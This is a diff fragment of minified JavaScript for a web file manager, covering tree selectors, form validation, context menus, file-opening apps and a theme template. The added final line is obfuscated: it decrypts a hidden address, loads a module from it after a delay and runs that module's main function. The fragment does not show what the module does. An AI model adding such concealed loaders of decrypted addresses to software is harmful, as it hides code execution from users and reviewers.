i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
    ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},b=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},g=function(e,t,a){var i=b(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:b,bindEvent:o,getFormData:m,initDialog:g}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
  • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
  • '+r(o.icon)+""+d+"
  • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
    ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a]; -switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},b=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return b(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
    ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
    '+LNG.unknow_file_tips+"
    "+t+'
    2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
    3.'+r+o+'">'+LNG.unknow_file_download+'
    '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
    ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:-1,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("url"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/src/app/page",[],function(){var e,t=function(){e=location.hash.split("#",2)[1],e||(e="all"),n(e),$("ul.setting a").click(function(){e!=$(this).attr("data-type")&&(e=$(this).attr("data-type"),n(e))}),$(".app-model [action]").die("click").live("click",function(e){return a($(this).attr("action"),$(this)),$(this).parents(".dropdown-menu").exists()&&$(this).parents(".btn-group").removeClass("open"),stopPP(e)})},a=function(e,t){if("createApp"==e)return window.parent&&window.parent.ui.path.pathOperate.appEdit("","","rootAdd"),void 0;t.hasClass("app-li")||(t=t.parents(".app-li"));var a=t.attr("data-app"),i=jsonDecode(base64Decode(a));switch(e){case"createApp":window.parent&&window.parent.ui.path.pathOperate.appEdit("","","rootAdd");break;case"preview":core.openApp(i);break;case"add":var o="/";ShareData.frameTop("",function(e){o=e.G.thisPath});var s=urlEncode(o+i.name),r=G.appHost+"app/userApp&action=add&path="+s;$.ajax({url:r,dataType:"json",type:"POST",data:{data:urlEncode(jsonEncode(i))},error:core.ajaxError,success:function(e){Tips.tips(e.data,e.code),e.code&&ShareData.frameTop("",function(e){e.ui.f5()})}});break;case"edit":ShareData.frameTop("",function(e){e.ui.path.pathOperate.appEdit(i,"","rootEdit")});break;case"del":$.dialog({id:"dialog_app_remove",icon:"question",padding:20,width:200,lock:!0,background:"#000",opacity:.3,content:LNG.remove_info,ok:function(){$.ajax({url:G.appHost+"app/del&name="+urlEncode(i.name),dataType:"json",error:core.ajaxError,success:function(e){Tips.tips(e.data,e.code),e.code&&n()}})},cancel:!0});break;default:}},i=function(e){var t="",a=" ";G.isRoot||(a="");for(var i in e)if(e[i]){var n=e[i].icon;-1==n.search(G.staticPath)&&"http"!=n.substring(0,4)&&(n=G.staticPath+"images/file_icon/icon_app/"+n),t+="
  • "+e[i].name+"
    "+a+"
  • "}for(var i=0;20>i;i++)t+="
    ";return t+="
    "},n=function(t){(void 0==t||""==t)&&(t=e),$(".selected").removeClass("selected"),$('ul.setting a[data-type="'+t+'"]').addClass("selected"),$(".main").find(".h1").html(""+$(".selected").text());var a=$(".main .app-list");$.ajax({url:G.appHost+"app/get&group="+t,dataType:"json",beforeSend:function(){},success:function(e){a.html(i(e.data)),$("body").scrollTop(0)}})};return{reload:n,init:t}}); \ No newline at end of file +e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var 